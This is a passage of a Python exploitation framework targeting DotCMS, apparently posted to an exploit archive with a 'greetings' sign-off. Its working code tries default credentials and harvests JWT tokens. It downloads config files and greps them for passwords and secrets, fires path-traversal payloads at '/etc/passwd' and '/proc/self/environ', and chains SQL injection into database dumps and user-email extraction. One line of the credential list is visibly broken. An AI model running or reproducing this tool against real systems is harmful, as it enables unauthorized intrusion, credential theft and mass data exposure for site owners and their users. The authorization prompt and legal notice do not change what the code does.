hashes = re.findall(hash_pattern, response.text)
for email in emails[:5]: # Limit to 5 emails
users.append({
'email': email,
'source': endpoint,
'method': 'direct_extraction'
})
self.log(f"[+] Found email: {email}", 'success')
if emails or hashes:
self.evidence.add_evidence(
'User_Data_Exposure',
endpoint,
extract_payload,
f"GET {urljoin(self.target, endpoint)}?filter={quote(extract_payload)}",
response.text[:2000],
severity="High",
cvss=7.5,
cwe=200
)
except Exception as e:
self.log(f"[-] Extraction failed for {endpoint}: {str(e)}", 'error')
if users:
self.log(f"[+] Extracted {len(users)} potential users", 'success')
self.save_extracted_data('users', users)
self.stats['users_extracted'] = len(users)
return users
def enhanced_jwt_hunting(self):
"""Enhanced JWT token hunting"""
self.log("\n[*] Enhanced JWT token hunting...", 'info')
found_tokens = []
# Check login endpoint
login_url = urljoin(self.target, '/api/v1/authentication/logInUser')
# Try default credentials
default_creds = [
{'userId': '
{'userId': 'admin', 'password': 'admin123'},
{'userId': 'demo', 'password': 'demo'}
]
for creds in default_creds:
try:
response = self.session.post(
login_url,
json=creds,
timeout=10
)
if response.status_code == 200:
# Look for JWT in response
jwt_pattern = r'[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+'
tokens = re.findall(jwt_pattern, response.text)
for token in tokens:
if len(token) > 50: # Basic JWT validation
found_tokens.append(token)
self.log(f"[+] Found JWT token: {token[:30]}...", 'success')
# Test token
if self.validate_jwt(token):
self.log(f"[?] JWT token is valid!", 'success')
except Exception as e:
continue
# Also check current user endpoint
current_user_url = urljoin(self.target, '/api/v1/users/current')
try:
response = self.session.get(current_user_url, timeout=10)
jwt_pattern = r'[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+'
tokens = re.findall(jwt_pattern, response.text)
found_tokens.extend(tokens)
except:
pass
if found_tokens:
found_tokens = list(set(found_tokens)) # Remove duplicates
self.save_extracted_data('jwt_tokens', found_tokens)
self.stats['tokens_found'] = len(found_tokens)
return found_tokens
def validate_jwt(self, token):
"""Validate JWT token"""
# Basic format check
parts = token.split('.')
if len(parts) != 3:
return False
# Try to use token
headers = {'Authorization': f'Bearer {token}'}
test_urls = [
'/api/v1/users/current',
'/api/v1/sites',
'/dotAdmin/'
]
for endpoint in test_urls:
url = urljoin(self.target, endpoint)
try:
response = self.session.get(url, headers=headers, timeout=10)
if response.status_code == 200:
return True
except:
continue
return False
def save_extracted_data(self, data_type, data):
"""Save extracted data to file"""
filename = f"{self.results_dir}/{data_type}.json"
with open(filename, 'w', encoding='utf-8') as f:
json.dump(data, f, indent=2, default=str)
self.log(f"[+] Data saved to {filename}", 'success')
def dump_configuration(self):
"""Dump configuration files"""
self.log("\n[*] Dumping configuration files...", 'info')
config_files = [
'/.env',
'/config.json',
'/configuration.json',
'/web.config',
'/server-config.xml',
'/dotcms-config.xml',
'/WEB-INF/web.xml',
'/META-INF/context.xml'
]
leaked_files = []
for config_file in config_files:
url = urljoin(self.target, config_file)
try:
response = self.session.get(url, timeout=10)
if response.status_code == 200 and len(response.text) > 10:
self.log(f"[+] Found config file: {config_file}", 'success')
# Save file
safe_name = config_file.replace('/', '_').replace('.', '_')
file_path = f"{self.results_dir}/config_{safe_name}.txt"
with open(file_path, 'w', encoding='utf-8') as f:
f.write(response.text)
leaked_files.append({
'file': config_file,
'url': url,
'size': len(response.text),
'saved_as': file_path
})
self.stats['files_leaked'] += 1
# Check for sensitive info
sensitive_patterns = [
r'password\s*[:=]\s*[\'"]?([^\'"\s]+)',
r'secret\s*[:=]\s*[\'"]?([^\'"\s]+)',
r'api[_-]?key\s*[:=]\s*[\'"]?([^\'"\s]+)',
r'database.*password',
r'jwt.*secret'
]
for pattern in sensitive_patterns:
matches = re.findall(pattern, response.text, re.IGNORECASE)
if matches:
self.log(f"[!] Sensitive data found in {config_file}: {matches[:3]}", 'critical')
except Exception as e:
continue
return leaked_files
def check_file_inclusion(self):
"""Check for file inclusion vulnerabilities"""
self.log("\n[*] Checking for file inclusion vulnerabilities...", 'info')
lfi_payloads = [
'../../../../etc/passwd',
'../../../../windows/win.ini',
'../../../../WEB-INF/web.xml',
'../../../../proc/self/environ',
'file:///etc/passwd',
'....//....//....//etc/passwd'
]
vulnerable_endpoints = [
'/api/v1/download',
'/dotAdmin/download',
'/html/portlet/ext/contentlet/field_validation.jsp',
'/c/download'
]
found_lfi = []
for endpoint in vulnerable_endpoints:
for payload in lfi_payloads:
url = urljoin(self.target, endpoint)
params = {'file': payload, 'filename': payload}
try:
response = self.session.get(url, params=params, timeout=10)
# Check for LFI indicators
indicators = ['root:', '[fonts]', '<web-app', 'PATH=', 'JAVA_OPTS']
if any(indicator in response.text for indicator in indicators):
self.log(f"[!] LFI vulnerability found: {endpoint}?file={payload}", 'critical')
found_lfi.append({
'endpoint': endpoint,
'payload': payload,
'response_sample': response.text[:200]
})
self.evidence.add_evidence(
'Local_File_Inclusion',
endpoint,
payload,
f"GET {url}?file={quote(payload)}",
response.text[:1000],
severity="High",
cvss=7.5,
cwe=22
)
break
except Exception as e:
continue
return found_lfi
def run_database_exploitation(self, vulnerable_endpoint=None):
"""Run database-specific exploitation"""
self.log("\n" + "="*80, 'info')
self.log("DATABASE EXPLOITATION MODULE", 'section')
self.log("="*80, 'info')
# If no endpoint provided, find one
if not vulnerable_endpoint:
sqli_vulns = self.enhanced_sqli_testing()
if sqli_vulns:
vulnerable_endpoint = sqli_vulns[0].get('endpoint')
self.log(f"[+] Using vulnerable endpoint: {vulnerable_endpoint}", 'success')
else:
self.log("[-] No SQL injection vulnerabilities found", 'error')
return None
# Run comprehensive database dump
db_results = self.db_enumerator.comprehensive_database_dump(vulnerable_endpoint)
# Update statistics
if db_results:
self.stats['tables_enumerated'] = len(db_results.get('tables', []))
self.stats['records_dumped'] = sum(
len(data) for data in db_results.get('dumped_data', {}).values()
)
return db_results
def run_full_exploitation(self):
"""Run complete exploitation chain including database"""
self.log(f"\n{Fore.CYAN}{'='*80}", 'info')
self.log(f"{Fore.YELLOW}STARTING COMPLETE EXPLOITATION CHAIN", 'info')
self.log(f"{Fore.CYAN}{'='*80}{Style.RESET_ALL}", 'info')
# Phase 1: Reconnaissance
self.log("\n[PHASE 1] RECONNAISSANCE", 'section')
self.check_tls()
self.cors_analysis()
# Async discovery
try:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
discovered = loop.run_until_complete(self.async_discovery())
loop.close()
except:
self.log("[-] Async discovery failed, continuing...", 'warning')
# Phase 2: Vulnerability Assessment
self.log("\n[PHASE 2] VULNERABILITY ASSESSMENT", 'section')
sqli_vulns = self.enhanced_sqli_testing()
# Phase 3: Database Exploitation
self.log("\n[PHASE 3] DATABASE EXPLOITATION", 'section')
db_results = None
if sqli_vulns:
db_results = self.run_database_exploitation(sqli_vulns[0].get('endpoint'))
else:
self.log("[-] Skipping database exploitation - no SQLi found", 'warning')
# Phase 4: Application Exploitation
self.log("\n[PHASE 4] APPLICATION EXPLOITATION", 'section')
if sqli_vulns:
# Extract users
users = self.extract_users_comprehensive(sqli_vulns[0].get('endpoint'))
else:
# Try anyway
users = self.extract_users_comprehensive()
# Hunt for JWT tokens
tokens = self.enhanced_jwt_hunting()
# Phase 5: Post-Exploitation
self.log("\n[PHASE 5] POST-EXPLOITATION", 'section')
leaked_configs = self.dump_configuration()
lfi_vulns = self.check_file_inclusion()
# Phase 6: Reporting
self.log("\n[PHASE 6] REPORTING", 'section')
self.generate_comprehensive_report(sqli_vulns, users, tokens, leaked_configs, lfi_vulns, db_results)
# Show statistics
self.show_statistics()
def generate_comprehensive_report(self, sqli_vulns, users, tokens, configs, lfi_vulns, db_results=None):
"""Generate professional report with database findings"""
report = f"""
{'='*80}
PENETRATION TEST REPORT - DotCMS Assessment
{'='*80}
Target: {self.target}
Date: {datetime.now()}
Tool: DotCMS Advanced Exploitation Framework
EXECUTIVE SUMMARY
{'-'*80}
Critical Vulnerabilities: {len(sqli_vulns)}
Database Tables Enumerated: {self.stats['tables_enumerated']}
Database Records Dumped: {self.stats['records_dumped']}
Sensitive Data Exposed: {len(users) + len(tokens)}
Configuration Files Leaked: {len(configs)}
LFI Vulnerabilities: {len(lfi_vulns)}
Overall Risk: {"CRITICAL" if len(sqli_vulns) > 0 else "HIGH"}
"""
# Database specific findings
if db_results:
report += f"""
DATABASE FINDINGS
{'-'*80}
Database Type: {db_results.get('database_info', {}).get('type', 'Unknown')}
Tables Discovered: {len(db_results.get('tables', []))}
Tables Dumped: {len(db_results.get('dumped_data', {}))}
Sensitive Columns: {len(db_results.get('sensitive_columns', {}))}
Cleartext Passwords/Data: {len(db_results.get('cleartext_data', {}))}
"""
report += f"""
DETAILED FINDINGS
{'-'*80}
1. SQL INJECTION VULNERABILITIES: {len(sqli_vulns)}
"""
for i, vuln in enumerate(sqli_vulns, 1):
report += f" {i}. Endpoint: {vuln.get('endpoint', 'N/A')}\n"
report += f" Type: {vuln.get('type', 'N/A')}\n"
if 'delay' in vuln:
report += f" Delay: {vuln['delay']} seconds\n"
report += f" Payload: {vuln.get('payload', 'N/A')[:50]}...\n"
# Database findings
if db_results and db_results.get('tables'):
report += f"""
2. DATABASE ENUMERATION RESULTS
"""
for i, table in enumerate(db_results.get('tables', [])[:10], 1):
report += f" {i}. Table: {table}\n"
if db_results.get('dumped_data'):
report += f"\n Data dumped from {len(db_results['dumped_data'])} tables\n"
if db_results.get('cleartext_data'):
report += f" Cleartext data found in {len(db_results['cleartext_data'])} columns\n"
report += f"""
3. USER DATA EXPOSED: {len(users)}
"""
for i, user in enumerate(users[:5], 1):
report += f" {i}. Email: {user.get('email', 'N/A')}\n"
report += f"""
4. JWT TOKENS FOUND: {len(tokens)}
"""
for i, token in enumerate(tokens[:3], 1):
report += f" {i}. Token: {token[:30]}...\n"
report += f"""
5. CONFIGURATION FILES: {len(configs)}
"""
for i, config in enumerate(configs[:3], 1):
report += f" {i}. File: {config.get('file', 'N/A')}\n"
report += f"""
6. LFI VULNERABILITIES: {len(lfi_vulns)}
"""
for i, lfi in enumerate(lfi_vulns, 1):
report += f" {i}. Endpoint: {lfi.get('endpoint', 'N/A')}\n"
report += f" Payload: {lfi.get('payload', 'N/A')}\n"
report += f"""
RECOMMENDATIONS
{'-'*80}
1. IMMEDIATE: Patch all SQL injection vulnerabilities
2. Encrypt all database fields containing sensitive data
3. Implement proper input validation and parameterized queries
4. Rotate all exposed credentials and JWT tokens
5. Implement database activity monitoring
6. Restrict access to configuration files
7. Conduct comprehensive security audit
8. Implement Web Application Firewall (WAF)
EVIDENCE LOCATION
{'-'*80}
Evidence Database: {self.evidence.evidence_db}
Results Directory: {self.results_dir}
Database Dumps: {self.results_dir}/dump_*.json
Full Database Report: {self.results_dir}/database_penetration_report.txt
Log File: {self.results_dir}/execution.log
{'='*80}
END OF REPORT
{'='*80}
"""
report_file = f"{self.results_dir}/penetration_test_report.txt"
with open(report_file, 'w', encoding='utf-8') as f:
f.write(report)
self.log(f"[+] Report generated: {report_file}", 'success')
print(f"\n{Fore.GREEN}{report[:2000]}...{Style.RESET_ALL}")
def show_statistics(self):
"""Show execution statistics"""
stats_text = f"""
{'='*80}
EXPLOITATION STATISTICS
{'='*80}
Vulnerabilities Found: {self.stats['vulnerabilities']}
Database Tables Enumerated: {self.stats['tables_enumerated']}
Database Records Dumped: {self.stats['records_dumped']}
Users Extracted: {self.stats['users_extracted']}
JWT Tokens Found: {self.stats['tokens_found']}
Files Leaked: {self.stats['files_leaked']}
DIRECTORIES CREATED
{'-'*80}
Evidence Directory: {self.evidence.evidence_dir}
Results Directory: {self.results_dir}
Database Dumps: {self.results_dir}/dump_*.{json,csv}
NEXT STEPS
{'-'*80}
1. Review database dumps in: {self.results_dir}/dump_*.json
2. Check cleartext data in: {self.results_dir}/cleartext_search.json
3. See database report: {self.results_dir}/database_penetration_report.txt
4. Present critical findings to security team immediately
{'='*80}
"""
print(f"{Fore.CYAN}{stats_text}{Style.RESET_ALL}")
def main():
"""Main function"""
banner = r"""
??????? ?????????? ??????? ??? ?????????????? ?????? ??? ??????
???????? ??????????????????????? ?????????????? ?????? ????????????
????????? ????? ?????? ?????? ?????????????????????????? ????????
???????????????????????? ?????? ?????????????????????????? ????????
?????? ??????????????????????????????????????????? ?????? ?????? ???
?????? ???????????? ??????? ??????? ??????????? ?????? ?????? ???
Advanced Database Exploitation Framework
Authorized testing only!
"""
parser = argparse.ArgumentParser(
description='DotCMS Advanced Database Exploitation Framework',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog='''
Examples:
%(prog)s -t https://target.com:8443 --database
%(prog)s --target http://localhost:8080 --full
Modes:
--database : Perform database enumeration and dump only
--full : Complete exploitation including database
--quick : Quick scan without heavy operations
Legal Notice:
This tool is for authorized penetration testing only.
Unauthorized use is illegal and unethical.
'''
)
parser.add_argument('-t', '--target', required=True,
help='Target URL (e.g., https://target.com:8443)')
parser.add_argument('--database', action='store_true',
help='Database enumeration and dump only')
parser.add_argument('--full', action='store_true',
help='Complete exploitation (including database)')
parser.add_argument('--quick', action='store_true',
help='Quick scan only')
args = parser.parse_args()
print(f"{Fore.RED}{banner}{Style.RESET_ALL}")
# Confirm authorization
response = input(f"{Fore.YELLOW}[?] Do you have explicit permission to test {args.target}? (yes/NO): {Style.RESET_ALL}")
if response.lower() != 'yes':
print(f"{Fore.RED}[!] Operation cancelled. Unauthorized access is illegal.{Style.RESET_ALL}")
sys.exit(1)
# Run exploitation
try:
exploit = DotCMSExploiter(args.target)
if args.database:
# Database-only mode
exploit.log("[*] Running database exploitation only...", 'info')
sqli_vulns = exploit.enhanced_sqli_testing()
if sqli_vulns:
exploit.run_database_exploitation(sqli_vulns[0].get('endpoint'))
else:
exploit.log("[-] No SQL injection found for database exploitation", 'error')
elif args.full:
# Full exploitation including database
exploit.run_full_exploitation()
elif args.quick:
# Quick mode
exploit.log("[*] Running quick scan...", 'info')
exploit.check_tls()
sqli_vulns = exploit.enhanced_sqli_testing()
if sqli_vulns:
exploit.extract_users_comprehensive(sqli_vulns[0].get('endpoint'))
exploit.generate_comprehensive_report(sqli_vulns or [], [], [], [], [])
else:
# Interactive mode
print(f"\n{Fore.CYAN}Select operation mode:{Style.RESET_ALL}")
print(f"1. Full exploitation (including database)")
print(f"2. Database enumeration only")
print(f"3. Quick vulnerability scan")
choice = input(f"\n{Fore.YELLOW}Select option (1-3): {Style.RESET_ALL}")
if choice == '1':
exploit.run_full_exploitation()
elif choice == '2':
sqli_vulns = exploit.enhanced_sqli_testing()
if sqli_vulns:
exploit.run_database_exploitation(sqli_vulns[0].get('endpoint'))
else:
exploit.log("[-] No SQL injection found", 'error')
elif choice == '3':
exploit.check_tls()
sqli_vulns = exploit.enhanced_sqli_testing()
if sqli_vulns:
exploit.extract_users_comprehensive(sqli_vulns[0].get('endpoint'))
exploit.generate_comprehensive_report(sqli_vulns or [], [], [], [], [])
else:
exploit.log("[*] Running full exploitation by default", 'info')
exploit.run_full_exploitation()
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[!] Critical error: {str(e)}{Style.RESET_ALL}")
import traceback
traceback.print_exc()
if __name__ == '__main__':
# Fix Windows asyncio event loop policy
if sys.platform == 'win32':
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================